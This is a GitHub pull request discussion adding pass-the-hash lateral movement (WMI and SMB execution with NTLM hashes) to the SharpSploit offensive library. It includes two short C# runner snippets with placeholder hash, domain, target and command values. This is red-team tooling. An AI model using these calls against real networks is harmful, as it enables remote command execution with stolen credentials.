Merge pth into master #44

Open
wants to merge 8 commits into
base: dev

checkymander
Collaborator

Added pass the hash functionality into SharpSploit, WMIExecute and SMBExecute based on the Invoke-TheHash codebase. Code can be tested with the following runner:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(PassTheHash.WMIExecute("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>"));

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

The library supports both Admin Check functionality, and command execution with support for WMI, SMB1, and SMB2 (including signing).

@cobbr cobbr changed the base branch from master to dev April 18, 2020 23:38
checkymander added 3 commits August 2, 2020 20:50
…ted a dedicated LateralMovement.SMB namespace, adding pth modules into there. Renamed modules to avoid clashing with the existing modules in those namespaces.
@checkymander
Collaborator Author

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(WMI.WMIExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>"));

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

Updated example code to reference the new function names


edermi commented Apr 7, 2021

Any chance to get this merged into master? Would love to see this in Covenant in the long run
